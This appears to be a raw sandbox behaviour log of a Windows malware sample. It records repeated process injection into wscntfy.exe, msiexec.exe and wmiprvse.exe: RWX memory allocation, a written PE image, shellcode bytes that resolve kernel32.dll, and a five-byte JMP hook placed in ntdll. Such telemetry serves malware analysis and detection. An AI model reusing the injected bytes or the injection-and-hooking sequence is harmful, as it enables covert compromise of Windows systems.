Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2042954627
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2042976636
System info queried Type: BasicInformation success or wait 2042976929
System info queried Type: ProcessorInformation success or wait 2042977157
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2042977219
System info queried Type: BasicInformation success or wait 2042977637
System info queried Type: ProcessorInformation success or wait 2042977989
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042978645
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042978703
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7C210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2042978923
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2042979281
System info queried Type: BasicInformation success or wait 2042979756
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2042979813
System info queried Type: ProcessorInformation success or wait 2042979996
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2042980298
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2042980503
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2042980832
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042981393
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2042981685
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042981947
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2042982211
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2042982420
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2042982638
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042982725
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042983062
System info queried Type: BasicInformation success or wait 2042983563
System info queried Type: ProcessorInformation success or wait 2042983749
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2042983803
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2042984507
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2042984749
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2043009817
System info queried Type: BasicInformation success or wait 2043010029
System info queried Type: ProcessorInformation success or wait 2043010304
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2043010667
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043011233
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 1D 84 success or wait 2043032539
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB90D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043032885
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2043033493
System info queried Type: BasicInformation success or wait 2043033925
Memory allocated PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2043034033
System info queried Type: ProcessorInformation success or wait 2043034224
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043034274
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043034542
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2043034813
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2043035391
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2043035516
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2043035627
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2046818384
Thread delayed Time: 0 TID: 4214 success or wait 2046819602
Thread delayed Time: 0 TID: 4214 success or wait 2046819705
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046820085
Thread delayed Time: 0 TID: 4214 success or wait 2046821044
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2046821446
Thread delayed Time: 0 TID: 4214 success or wait 2046821643
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2046822339
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2046844659
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046845025
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046845260
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046845639
Memory allocated PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 990000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2046845687
System info queried Type: BasicInformation success or wait 2046845970
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046846611
System info queried Type: ProcessorInformation success or wait 2046847101
System info queried Type: BasicInformation success or wait 2046847184
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2046847416
System info queried Type: ProcessorInformation success or wait 2046848702
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2046848982
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046849682
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2046852994
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB904E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046853264
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2046853546
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2046853699
System info queried Type: BasicInformation success or wait 2046853826
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2046854519
System info queried Type: ProcessorInformation success or wait 2046854791
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2046855133
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046855616
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046855686
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2046856363
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046856659
System info queried Type: BasicInformation success or wait 2046856815
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2046856904
System info queried Type: ProcessorInformation success or wait 2046857064
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2046857800
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046858325
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 990000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2046883525
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2046883818
Memory attributes changed PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2046884018
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2046884495
Memory written PID: 724 Path: C:\WINDOWS\system32\msiexec.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 08 84 success or wait 2046908266
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2046908468
Memory allocated PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2046909842
System info queried Type: BasicInformation success or wait 2046909894
System info queried Type: ProcessorInformation success or wait 2046910120
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046910733
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911300
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911368
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB765C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911539
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2046911674
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2046912367
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2048438697
Thread delayed Time: 0 TID: 4214 success or wait 2048439548
Thread delayed Time: 0 TID: 4214 success or wait 2048439650
System info queried Type: BasicInformation success or wait 2048440021
Thread delayed Time: 0 TID: 4214 success or wait 2048441004
System info queried Type: ProcessorInformation success or wait 2048441844
Thread delayed Time: 0 TID: 4214 success or wait 2048442109
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048442377
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2048465599
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048465976
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2048466195
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048466459
Memory allocated PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: C00000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2048466566
System info queried Type: BasicInformation success or wait 2048466974
System info queried Type: ProcessorInformation success or wait 2048467278
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2048467337
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2048467568
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048467940
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048468074
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2048468615
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2048468678
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2048468939
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2048469189
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2048469638
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2048469870
System info queried Type: BasicInformation success or wait 2048470307
System info queried Type: ProcessorInformation success or wait 2048470615
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2048470989
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048471823
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: BB7F660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2048472114
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2048472246
System info queried Type: BasicInformation success or wait 2048472956
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 71AB4C27 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2048473015
System info queried Type: ProcessorInformation success or wait 2048473909
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2048474558
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: C00000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2048498360
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048498684
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2048498939
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2048499139
Memory written PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 2F 84 success or wait 2048594433
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2048594507
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2048595003
